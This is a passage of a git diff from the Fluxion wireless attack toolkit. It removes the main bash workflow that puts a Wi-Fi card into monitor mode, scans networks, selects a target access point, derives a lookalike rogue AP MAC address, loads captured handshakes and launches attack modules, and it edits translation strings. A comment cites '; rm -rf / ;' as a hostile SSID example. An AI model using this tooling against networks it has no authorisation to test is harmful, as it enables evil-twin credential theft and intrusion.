'rt2800|rt73')" ]; then - rmmod -f $ifDriver &>$FLUXIONOutputDevice 2>&1 - - # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONUnloadingWIDriverNotice)" - while interface_physical "$ifSelected"; do sleep 1 - done - fi - fi - - if [ "$FLUXIONWIKillProcesses" ]; then - # Get list of potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - # This shit has to go reeeeeal soon (airmon-ng)... - local conflictPrograms=($(airmon-ng check | awk 'NR>6{print $2}')) - - # Kill potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - for program in "${conflictPrograms[@]}"; do killall "$program" &>$FLUXIONOutputDevice - done - fi - - if [ "$FLUXIONWIReloadDriver" ]; then - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then modprobe "$ifDriver" &>$FLUXIONOutputDevice 2>&1 - fi - - # Wait while interface becomes available. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONLoadingWIDriverNotice)" - while ! interface_physical "$ifSelected"; do sleep 1 - done - fi - - # Activate wireless interface monitor mode and save identifier. - echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - if [ "$FLUXIONAirmonNG" ]; then - # TODO: Need to check weather switching to monitor mode below failed. - # Notice: Line below could cause issues with different airmon versions. - FluxionRunInterface=$(airmon-ng start $ifSelected | awk -F'\[phy[0-9]+\]|\)' '$0~/monitor .* enabled/{print $3}' 2>/dev/null) - else - if interface_set_mode "$ifSelected" "monitor"; then FluxionRunInterface=$ifSelected - else FluxionRunInterface="" - fi - fi - - if [ "$FluxionRunInterface" ]; then - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIEnabledNotice" - sleep 3 - else - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIFailedError" - sleep 3 - return 2 - fi -} - -###################################### < Scanner > ##################################### -function fluxion_set_scanner() { - # If scanner's already been set and globals are ready, we'll skip setup. - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - if [ "$FLUXIONAuto" ]; then - fluxion_run_scanner $WIMonitor - else - local choices=("$FLUXIONScannerChannelOptionAll (2.4GHz)" "$FLUXIONScannerChannelOptionAll (5GHz)" "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption") - io_query_choice "$FLUXIONScannerChannelQuery" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_run_scanner $WIMonitor "" "bg" ;; - "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_run_scanner $WIMonitor "" "a" ;; - "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_run_scanner $WIMonitor "" "abg" ;; - "$FLUXIONScannerChannelOptionSpecific") fluxion_set_scanner_channel ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_interface - return 1 - ;; - esac - fi - - if [ $? -ne 0 ]; then return 1; fi -} - -function fluxion_set_scanner_channel() { - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" - echo - echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " - echo - echo -ne "$FLUXIONPrompt" - - local channels - read channels - - echo - - fluxion_run_scanner $WIMonitor $channels - if [ $? -ne 0 ]; then return 1; fi -} - -# Parameters: monitor [ channel(s) [ band(s) ] ] -function fluxion_run_scanner() { - if [ ${#@} -lt 1 ]; then return 1; fi - - echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" - echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" - - # Remove any pre-existing scanner results. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ "$FLUXIONAuto" ]; then - sleep 30 && killall xterm & - fi - - # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2>/dev/null; then - echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" - sleep 5 - return 1 - fi - - # Fix this below, creating subshells for something like this is somewhat ridiculous. - local scannerResultsExist=$([ -f "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - local scannerResultsReadable=$([ -s "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - - if [ ! "$scannerResultsReadable" ]; then - if [ "$scannerResultsExist" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - fi - - local choices=("$FLUXIONGeneralBackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$FLUXIONScannerFailedNotice" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONGeneralBackOption") return 1 ;; - "$FLUXIONGeneralExitOption") - fluxion_exitmode - return 2 - ;; - esac - fi - - # Syntheize scan operation results from output file "dump-01.csv." - echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" - # Unfortunately, mawk (alias awk) does not support the {n} times matching operator. - # readarray TargetAPCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - # readarray TargetAPCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - - # Cleanup the workspace to prevent potential bugs/conflicts. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ ${#TargetAPCandidates[@]} -eq 0 ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" - sleep 3 - return 1 - fi -} - -###################################### < Target > ###################################### -function fluxion_unset_target_ap() { - APTargetSSID="" - APTargetChannel="" - APTargetEncryption="" - APTargetMAC="" - APTargetMakerID="" - APTargetMaker="" - APRogueMAC="" -} - -function fluxion_set_target_ap() { - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - fluxion_unset_target_ap - - local TargetAPCandidatesMAC=() - local TargetAPCandidatesClientsCount=() - local TargetAPCandidatesChannel=() - local TargetAPCandidatesSecurity=() - local TargetAPCandidatesSignal=() - local TargetAPCandidatesPower=() - local TargetAPCandidatesESSID=() - local TargetAPCandidatesColor=() - - for candidateAPInfo in "${TargetAPCandidates[@]}"; do - candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") - - local i=${#TargetAPCandidatesMAC[@]} - - TargetAPCandidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - TargetAPCandidatesClientsCount[i]=$(echo "${TargetAPCandidatesClients[@]}" | grep -c "${TargetAPCandidatesMAC[i]}") - TargetAPCandidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) - TargetAPCandidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) - TargetAPCandidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - TargetAPCandidatesColor[i]=$([ ${TargetAPCandidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) - - # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. - local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 | tr -d "'" | tr -d "\"" | tr -d "<" | tr -d ">" | tr -d "&") - TargetAPCandidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") - - local power=${TargetAPCandidatesPower[i]} - if [ $power -eq -1 ]; then - # airodump-ng's man page says -1 means unsupported value. - TargetAPCandidatesQuality[i]="??" - elif [ $power -le $FLUXIONNoiseFloor ]; then - TargetAPCandidatesQuality[i]=0 - elif [ $power -gt $FLUXIONNoiseCeiling ]; then - TargetAPCandidatesQuality[i]=100 - else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - TargetAPCandidatesQuality[i]=$(((${TargetAPCandidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) - fi - done - - local headerTitle=$( - format_center_literals "WIFI LIST" - echo -n "$FormatCenterLiterals\n\n" - ) - - format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") - - format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ - TargetAPCandidatesColor[@] \ - TargetAPCandidatesESSID[@] \ - TargetAPCandidatesQuality[@] \ - TargetAPCandidatesPower[@] \ - TargetAPCandidatesClientsCount[@] \ - TargetAPCandidatesChannel[@] \ - TargetAPCandidatesSecurity[@] \ - TargetAPCandidatesMAC[@] - - echo - - APTargetSSID=${IOQueryFormatFields[1]} - APTargetChannel=${IOQueryFormatFields[5]} - APTargetEncryption=${IOQueryFormatFields[6]} - APTargetMAC=${IOQueryFormatFields[7]} - APTargetMakerID=${APTargetMAC:0:8} - APTargetMaker=$(macchanger -l | grep ${APTargetMakerID,,} | cut -d ' ' -f 5-) - - # Sanitize network ESSID to normalize it and make it safe for manipulation. - # Notice: Why remove these? Because some smartass might decide to name their - # network something like "; rm -rf / ;". If the string isn't sanitized accidentally - # shit'll hit the fan and we'll have an extremely distressed person subit an issue. - # Removing: ' ', '/', '.', '~', '\' - APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g') - - # We'll change a single hex digit from the target AP's MAC address. - # This new MAC address will be used as the rogue AP's MAC address. - local APRogueMACChange=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - APRogueMAC="${APTargetMAC::13}${APRogueMACChange:1:1}${APTargetMAC:14:4}" -} - -function fluxion_show_ap_info() { - format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" - - local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - - printf "$colorlessFormat" "" "ESSID" "\"$APTargetSSID\" / $APTargetEncryption" "" - printf "$colorlessFormat" "" "Channel" "$APTargetChannel" "" - printf "$colorfullFormat" "" "BSSID" "$APTargetMAC ($CYel${APTargetMaker:-UNKNOWN}$CClr)" "" - - echo -} - -#################################### < AP Service > #################################### -function fluxion_unset_ap_service() { - APRogueService="" -} - -function fluxion_set_ap_service() { - if [ "$APRogueService" ]; then return 0; fi - - fluxion_unset_ap_service - - if [ "$FLUXIONAuto" ]; then - APRogueService="hostapd" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAPServiceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONAPServiceHostapdOption" "$FLUXIONAPServiceAirbaseOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONAPServiceHostapdOption") APRogueService="hostapd" ;; - "$FLUXIONAPServiceAirbaseOption") APRogueService="airbase-ng" ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_ap_service - return 1 - ;; - *) - fluxion_conditional_bail - return 1 - ;; - esac - fi - - # AP Service: Load the service's helper routines. - source "lib/ap/$APRogueService.sh" -} - -###################################### < Hashes > ###################################### -function fluxion_check_hash() { - if [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; then - echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" - sleep 3 - return 1 - fi - - local verifier - - if [ "$FLUXIONAuto" ]; then - verifier="pyrit" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") verifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") verifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") return 1 ;; - esac - fi - - hash_check_handshake "$verifier" "$APTargetHashPath" "$APTargetSSID" "$APTargetMAC" >$FLUXIONOutputDevice - local hashResult=$? - - # A value other than 0 means there's an issue with the hash. - if [ $hashResult -ne 0 ]; then echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" - else echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" - fi - - sleep 3 - - if [ $hashResult -ne 0 ]; then return 1; fi -} - -function fluxion_set_hash_path() { - fluxion_header - echo - echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" - echo - echo -ne "$FLUXIONAbsolutePathInfo: " - read APTargetHashPath -} - -function fluxion_unset_hash() { - APTargetHashPath="" -} - -function fluxion_set_hash() { - if [ "$APTargetHashPath" ]; then return 0; fi - - fluxion_unset_hash - - # Scan for an existing hash for potential use, if one exists, - # ask the user if we should use it, or to skip it. - if [ -f "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" -a \ - -s "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" ]; then - - if [ ! "$FLUXIONAuto" ]; then - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - printf "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] " - - read APTargetHashPathConsidered - - echo - fi - - if [ "$APTargetHashPathConsidered" = "" -o "$APTargetHashPathConsidered" = "y" -o "$APTargetHashPathConsidered" = "Y" ]; then - APTargetHashPath="$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - fluxion_check_hash - # If the user decides to go back, we must unset. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - fi - fi - - # If the hash was not found, or if it was skipped, - # ask for location or for gathering one. - while [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; do - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashSourceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashSourcePathOption" "$FLUXIONHashSourceRescanOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashSourcePathOption") - fluxion_set_hash_path - fluxion_check_hash - ;; - "$FLUXIONHashSourceRescanOption") fluxion_set_hash ;; # Rescan checks hash automatically. - "$FLUXIONGeneralBackOption") - fluxion_unset_hash - return 1 - ;; - esac - - # This conditional is required for return values - # of operation performed in the case statement. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - done - - # Copy to workspace for hash-required operations. - cp "$APTargetHashPath" "$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap" -} - -###################################### < Attack > ###################################### -function fluxion_unset_attack() { - if [ "$FLUXIONAttack" ]; then unprep_attack - fi - FLUXIONAttack="" -} - -# Select the attack strategy to be used. -function fluxion_set_attack() { - if [ "$FLUXIONAttack" ]; then return 0; fi - - fluxion_unset_attack - - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAttackQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - #local attacksMeta=$(head -n 3 attacks/*/language/$FLUXIONLanguage.sh) - - #local attacksIdentifier - #readarray -t attacksIdentifier < <("`echo "$attacksMeta" | grep -E "^# identifier: " | sed -E 's/# \w+: //'`") - - #local attacksDescription - #readarray -t attacksDescription < <("`echo "$attacksMeta" | grep -E "^# description: " | sed -E 's/# \w+: //'`") - - local attacks - readarray -t attacks < <(ls -1 attacks) - - local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') - - local identifiers=() - - local attack - for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" - if [ "$identifier" ]; then identifiers+=("$identifier") - else identifiers+=("$attack") - fi - done - - attacks+=("$FLUXIONGeneralBackOption") - identifiers+=("$FLUXIONGeneralBackOption") - descriptions+=("") - - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] - - echo - - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then - fluxion_unset_target_ap - fluxion_unset_attack - return 1 - fi - - FLUXIONAttack=${IOQueryFormatFields[0]} - - # Load attack and its corresponding language file. - source "attacks/$FLUXIONAttack/language/$FLUXIONLanguage.sh" - source "attacks/$FLUXIONAttack/attack.sh" - - prep_attack - - if [ $? -ne 0 ]; then - fluxion_unset_attack - return 1 - fi -} - -# Attack -function fluxion_run_attack() { - start_attack - - local choices=("$FLUXIONSelectAnotherAttackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] - - echo - - # IOQueryChoice is a global, meaning, its value is volatile. - # We need to make sure to save the choice before it changes. - local choice="$IOQueryChoice" - - stop_attack - - if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then fluxion_handle_exit; fi - - fluxion_unset_attack -} - -################################### < FLUXION Loop > ################################### -fluxion_set_resolution -fluxion_set_language - -while true; do - fluxion_set_interface - if [ $? -ne 0 ]; then continue; fi - fluxion_set_scanner - if [ $? -ne 0 ]; then continue; fi - fluxion_set_target_ap - if [ $? -ne 0 ]; then continue; fi - fluxion_set_attack - if [ $? -ne 0 ]; then continue; fi - fluxion_run_attack - if [ $? -ne 0 ]; then continue; fi -done - -# FLUXSCRIPT END diff --git a/language/cs.sh b/language/cs.sh index 2928752..97a5bab 100755 --- a/language/cs.sh +++ b/language/cs.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Absolute path" FLUXIONScannerChannelQuery="Vyberte kanál" FLUXIONScannerChannelOptionAll="Všechny kanály" FLUXIONScannerChannelOptionSpecific="Specifický kanál(y)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Jeden kanál" FLUXIONScannerChannelMiltipleTip="Více kanálů" diff --git a/language/de.sh b/language/de.sh index 41030a5..f8267c9 100755 --- a/language/de.sh +++ b/language/de.sh @@ -2,26 +2,26 @@ # German # native: Deutsch -FLUXIONInterfaceQuery="Wähle deine Netzwerkkarte aus" -FLUXIONUnblockingWINotice="Entferne den Softblock von allen Netzwerkkarten..." -FLUXIONFindingExtraWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONRemovingExtraWINotice="Entferne freme drahtlose Netzwerkkarten..." -FLUXIONFindingWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in benutzung" -FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor du FLUXION nutzt." -FLUXIONGatheringWIInfoNotice="Sammeln der Daten von allen Netzwerken..." +FLUXIONInterfaceQuery="Wähle Sie ihre Netzwerkkarte aus" +FLUXIONUnblockingWINotice="Wiederherstellen von allen Netzwerkkarten..." +FLUXIONFindingExtraWINotice="Suche nach Netzwerkkarten..." +FLUXIONRemovingExtraWINotice="Entferne Netzwerkkarten..." +FLUXIONFindingWINotice="Suche nach Netzwerkkarten..." +FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in Benutzung" +FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor Sie FLUXION benutzen" +FLUXIONGatheringWIInfoNotice="Sammeln von Daten, von allen Netzwerken..." FLUXIONUnknownWIDriverError="Netzwerkkartentreiber konnte nicht bestimmt werden" FLUXIONUnloadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." -FLUXIONLoadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." +FLUXIONLoadingWIDriverNotice="Warte auf Treiberantwort \"\$wiSelected\"..." FLUXIONFindingConflictingProcessesNotice="Suche nach Diensten die Probleme verursachen können..." FLUXIONKillingConflictingProcessesNotice="Beende Diensten die Probleme verursachen können..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Die Physische Schnittstelle konnte nicht ermittelt werden" -FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im Monitor Mode" +FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im sogenannten Monitor Mode" FLUXIONMonitorModeWIEnabledNotice="${CGrn}Monitormode konnte erfolgreich gestartet werden" FLUXIONMonitorModeWIFailedError="${CRed}Monitormode konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starte Netzwerkscanner" -FLUXIONStartingScannerTip="Wenn nach etwa 5 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" +FLUXIONStartingScannerTip="Wenn nach etwa 30 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" FLUXIONPreparingScannerResultsNotice="Analysieren von allen gesammelten Daten..." FLUXIONScannerFailedNotice="Netzwerkkarte ist möglichweise nicht geeignet ( Keine Netzwerke gefunden )" FLUXIONScannerDetectedNothingNotice="Keine Netzwerke konnten gefunden werden" @@ -30,14 +30,15 @@ FLUXIONHashFileDoesNotExistError="Hash Datei existiert nicht" FLUXIONHashInvalidError="${CRed}Fehler$CClr, falscher Hash" FLUXIONHashValidNotice="${CGrn}Erfolgreich$CClr,Hash wurde erfolgreich verifiziert" FLUXIONPathToHandshakeFileQuery="Geben sie den Pfad zum Handshake an $CClr(Beispiel: /.../dump-01.cap)" -FLUXIONAbsolutePathInfo="Geben sie den Absoluten Pfad ein" +FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelQuery="Wähle deinen Netzwerkkanal aus" -FLUXIONScannerChannelOptionAll="Alle Netzwerkkanäle" -FLUXIONScannerChannelOptionSpecific="Spezifische Kanal(e)" +FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" +FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" +FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelSingleTip="Einzelner Kanal" -FLUXIONScannerChannelMiltipleTip="Mehrere Kanäle" +FLUXIONScannerChannelSingleTip="Einzelne Frequenz" +FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> @@ -48,15 +49,15 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Langsame Verbindung FLUXIONHashSourceQuery="Wähle eine Methode aus um den Handshake zu erlangen" FLUXIONHashSourcePathOption="Handshake Pfad eingeben" FLUXIONHashSourceRescanOption="Handshake Ordner neu einlesen" -FLUXIONFoundHashNotice="Ein hash wurde für das Netzwerk gefunden" -FLUXIONUseFoundHashQuery="Möchten sie dieses Netzwerk nutzen" -FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu Verifizieren" -FLUXIONHashVerificationMethodPyritOption="Pyrit Verifizierung (${CGrn}Empfohlen$CClr)" -FLUXIONHashVerificationMethodAircrackOption="Aircrack Verfizierung (${CYel}Unglaubwürdig$CClr)" +FLUXIONFoundHashNotice="Ein Hash wurde für das Netzwerk gefunden" +FLUXIONUseFoundHashQuery="Möchten Sie dieses Netzwerk nutzen?" +FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu verifizieren" +FLUXIONHashVerificationMethodPyritOption="Pyrit verifizierung (${CGrn}Empfohlen$CClr)" +FLUXIONHashVerificationMethodAircrackOption="Aircrack verfizierung (${CYel}Nicht empfohlen$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Wählen Sie einen drahtlosen Angriff für den Zugangspunkt aus" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr Angriff gestartet" -FLUXIONSelectAnotherAttackOption="Wähle einen anderen Angriff" +FLUXIONSelectAnotherAttackOption="Wählen Sie einen anderen Angriff" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Zurück" FLUXIONGeneralExitOption="${CRed}Ausgang" @@ -65,7 +66,7 @@ FLUXIONGeneralNotFoundError="Nicht gefunden" FLUXIONGeneralXTermFailureError="${CRed}Xterm Terminal konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONCleanupAndClosingNotice="Aufräumen und schließen" -FLUXIONKillingProcessNotice="Killing ${CGry}\$targetID$CClr" +FLUXIONKillingProcessNotice="Beende ${CGry}\$targetID$CClr" FLUXIONRestoringPackageManagerNotice="Restoring ${CCyn}\$PackageManagerCLT$CClr" FLUXIONDisablingMonitorNotice="Deaktivierung der Netzwerkkarte" FLUXIONDisablingExtraInterfacesNotice="Deaktivierung der Netzwerkkarte" diff --git a/language/el.sh b/language/el.sh index acca561..010cda0 100755 --- a/language/el.sh +++ b/language/el.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Εισαγετε διαδρομή αρχειου" FLUXIONScannerChannelQuery="Επίλεξτε κανάλι" FLUXIONScannerChannelOptionAll="Όλα τα κανάλια" FLUXIONScannerChannelOptionSpecific="Συγκεκριμένο(α) κανάλι(α)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Ενα κανάλι" FLUXIONScannerChannelMiltipleTip="Πολλαπλά κανάλια" diff --git a/language/en.sh b/language/en.sh index 6f9ea4a..40b64d1 100755 --- a/language/en.sh +++ b/language/en.sh @@ -3,22 +3,36 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" -FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." -FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." +FLUXIONAllocatingInterfaceNotice="Allocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$interfaceIdentifier\"." +FLUXIONReidentifyingInterface="Renaming interface." +FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." + +FLUXIONTargetTrackerInterfaceQuery="Select an interface for target tracking." + +#FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." FLUXIONSelectedBusyWIError="The wireless interface selected appears to be currently in 